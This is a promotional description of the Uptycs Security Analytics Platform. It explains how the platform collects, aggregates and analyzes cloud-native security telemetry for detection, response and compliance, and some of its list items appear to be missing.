The Uptycs Security Analytics Platform is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure. Most security stacks don’t make it easy to get the answers you need, and lack the transparency required to conduct forensics. But with unified observability across productivity endpoints, server workloads, container runtimes and orchestration systems, cloud providers, SaaS applications, and identity providers, Uptycs empowers security teams with actionable answers across their attack surface to improve enterprise-wide security.
If you’re struggling with questions like, “What containers in my environment are running this known vulnerable package?” or “Where else is this file hash appearing across my Kubernetes Cluster?” or “How many servers have had the password rotated in the last 90 days?”, Uptycs gives you the ability to get all the answers from the same console.
What questions do you have for your environment?
Meet your cloud-native security solution stack. The Uptycs platform is composed of:
With the relevant query-based sensors active, The Uptycs Security Analytics Platform immediately begins ingesting and analyzing telemetry, normalized in a tabular format so that you have connected insights across all of your asset classes in the same place.
The Uptycs Security Analytics Platform can be visualized as a data engineering pipeline with three stages:
In the collection phase, telemetry is captured via agent deployment to the host (osquery) or via native API integrations (kubequery, cloudquery) and transferred to the Uptycs backend using an HTTP TLS connection. The telemetry can be bucketed into two broad areas based on the attack surface:
The tabular telemetry can be acted upon both while it’s streaming (for real-time correlation and alerting) and once it's been aggregated and stored (for reporting and ad hoc historical querying).
The aggregation phase is where Uptycs’ speed and scale truly shines. Our eXtended Detection Network (XDN) applies scaling techniques, such as consistent hashing for horizontal scaling based on HTTP and TLS load balancing techniques to reliably spread the load and ingestion of the data. The Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. For example, a fleet of 100,000 machines, multiple concurrent Kubernetes clusters, and thousands of AWS accounts each providing configuration, CloudTrail activity, and AWS Flow Logs, can simultaneously connect and transmit telemetry to the Uptycs backend.
The XDN also facilitates cohort analysis. An example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on this single machine is then converted into a real-time query that then evaluates the other 999 machines.
In the analyze phase, Lambda analytics are used to analyze data while it’s in flight for near real-time correlation. While in flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be historically analyzed at scale.
This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals. These signals are correlated into tens of detections, making it possible for humans and automation to actually consume the insight and make data-driven decisions during investigations, for forensics efforts, and for evidence retrieval as a part of a compliance requirement.
Insights from the telemetry collected and analyzed across your cloud-native attack surface are presented as dashboards, reports, or alerts that solve for multiple security, IT, and compliance needs.
Using standards-based summarizations and visualizations, the Uptycs Security Analytics Platform helps teams solve for proactive audit and compliance-based requirements, and reactive detection and response based requirements.
For the purpose of Detection & Response, Uptycs applies the MITRE ATT&CK framework. For organizations that need to meet baseline Audit & Compliance or domain-specific compliance regulations, Uptycs is able to provide analytics to ensure that their business has the right security hygiene and meets the necessary regulatory compliance standards.
Together, these proactive and reactive controls—along with complete transparency into your security analytics—solve for multiple needs:
